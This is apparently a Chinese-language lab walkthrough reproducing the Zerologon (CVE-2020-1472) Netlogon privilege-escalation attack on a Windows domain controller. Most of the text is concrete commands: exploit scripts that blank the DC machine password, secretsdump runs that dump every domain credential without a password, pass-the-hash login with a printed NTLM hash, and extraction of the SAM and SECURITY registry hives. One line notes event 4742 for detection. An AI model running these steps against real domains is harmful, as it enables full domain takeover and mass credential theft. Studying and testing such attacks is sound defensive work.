CVE-2020-1472 是⼀个 windows 域控中严重的远程权限提升漏洞,攻击者通过 NetLogon,建⽴与域控间易受攻击的安全通道时,可利⽤此漏洞获取域管访问权限(将域控中保存在AD中的管理员password设置为空);其漏洞原理是发⽣在 RPC 认证过程的过程中,由于错误的使⽤了 AES-CFB8 加密所致。
可参考:CVE-2020-1472 - 安全更新程序指南 - Microsoft - Netlogon 特权提升漏洞
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
Windows Server, version 2004 (Server Core installation)
获取了一个加入了域的计算机权限,在域普通账号的情况下,将域管密码置空,导出域管hash,然后进行连接
poc:https://github.com/SecuraBV/CVE-2020-1472
1、获取域控主机名
net group "domain controllers" /domain
获取域控主机名为WIN2012$
2、检测域控是否存在漏洞
python zerologon_tester.py 域控主机名 域控ip
漏洞存在:
1、将域控密码置空
exp:https://github.com/dirkjanm/CVE-2020-1472
python cve-2020-1472-exploit.py WIN2012 192.168.52.163
此时如果机器重启则很可能起不来,会出问题
2、secretsdum.py导出域内所有用户的凭证
python secretsdump.py 域名/域控主机名@域控ip -no-pass
python secretsdump.py sentiment.com/WIN2012$@192.168.52.163 -no-pass >1.txt
3、wmiexec.py远程登录
python wmiexec.py administrator@192.168.52.163 -hashes aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634
前边将域控的密码置空了,所以需要恢复一下,否则可能脱域导致整个域环境瘫痪。
1、导出 sam system 等⽂件到本地,获取域控机器上本地保存之前的 hash 值⽤于恢复。
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
2、将sam文件导入本地
#这里没成功,所以手动拖出来了
get system.save
get sam.save
get security.save
3、删除域控内导出的文件
del /f system.save
del /f sam.save
del /f security.save
4、通过 sam.save、security.save、system.save ⽂件获得原来域控机器上的 Ntlm Hash 值,⽤于恢复密码
python secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
5、通过拿到 $MACHINE.ACC: 的值,然后进行恢复
脚本:https://github.com/risksense/zerologon/blob/master/reinstall_original_pw.py
python reinstall_original_pw.py 域控机器名 域控ip $MACHINE.ACC后半部分的值
python reinstall_original_pw.py WIN2012 192.168.52.163 beadd583f50a11bac3f8df4c0e7211ea
6、验证密码是否恢复
python secretsdump.py sentiment.com/WIN2012$@192.168.52.163 -no-pass
再使用开始的secretsdum.py导出域内所有用户的凭证,可见使用空密码去获取域内的所有用户的凭证已经不行了
在漏洞利用成功后,会在域控中留下4742事件,可用于蓝队检测。
NetLogon 域内提权漏洞(CVE-2020-1472)复现过程 - 腾讯云开发者社区-腾讯云 (tencent.com)
域内提权之CVE-2020-1472复现打域控_山山而川’的博客-CSDN博客_secretsdump.py下载